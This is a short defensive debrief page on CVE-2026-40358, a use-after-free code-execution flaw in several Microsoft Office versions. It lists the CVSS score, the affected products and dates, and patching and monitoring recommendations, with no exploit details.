PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-40358 Microsoft CVE debrief

A use-after-free vulnerability in Microsoft Office allows local code execution by an unauthorized attacker. The flaw was published by NVD on 2026-05-12 and last modified on 2026-05-19. Microsoft has issued a vendor advisory for this vulnerability. Affected products include Microsoft 365 Apps for Enterprise (x64 and x86), Office 2016, Office 2019, and Office Long Term Servicing Channel 2021 and 2024 across Windows (x64/x86) and macOS platforms. The vulnerability is classified under CWE-416 (Use After Free) with a CVSS 3.1 score of 8.4 (HIGH severity), characterized by local attack vector, low attack complexity, no privileges required, and no user interaction needed, resulting in high impacts to confidentiality, integrity, and availability.

Vendor
Microsoft
Product
Microsoft 365 Apps for Enterprise
CVSS
HIGH 8.4
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-12
Original CVE updated
2026-05-19
Advisory published
2026-05-12
Advisory updated
2026-05-19

Who should care

Organizations running Microsoft Office 2016, Office 2019, Microsoft 365 Apps for Enterprise, or Office Long Term Servicing Channel 2021/2024 on Windows or macOS endpoints. Security teams responsible for endpoint protection and patch management. IT administrators managing Office deployments in enterprise environments.

Technical summary

This vulnerability stems from a use-after-free memory corruption condition (CWE-416) within Microsoft Office components. The flaw can be triggered locally without requiring elevated privileges or user interaction, enabling an attacker to execute arbitrary code in the context of the Office application. The attack surface spans multiple Office deployment channels including perpetual license versions (2016, 2019) and Long Term Servicing Channel releases (2021, 2024) across both Windows and macOS architectures. The CVSS 3.1 vector (AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) indicates that while the attack requires local access, the absence of privilege requirements and user interaction constraints, combined with complete compromise of the CIA triad, elevates the severity rating. Organizations should prioritize patch deployment given the broad product coverage and high impact potential.

Defensive priority

HIGH

Recommended defensive actions

  • Apply security updates from Microsoft as referenced in the vendor advisory for CVE-2026-40358
  • Prioritize patching on systems running affected Office versions including Microsoft 365 Apps for Enterprise, Office 2016, Office 2019, and Office LTSC 2021/2024
  • Monitor Microsoft Security Response Center (MSRC) for additional guidance or updated patches
  • Review endpoint detection and response (EDR) alerts for anomalous Office process behavior indicating potential exploitation attempts
  • Restrict local access to Office applications on sensitive systems where patching is delayed

Evidence notes

Vulnerability description and CVSS scoring derived from NVD official record. Affected product list compiled from NVD CPE criteria. CWE-416 classification and vendor advisory reference confirmed via NVD source metadata. Timeline dates sourced from NVD published and modified timestamps.

Official resources

2026-05-12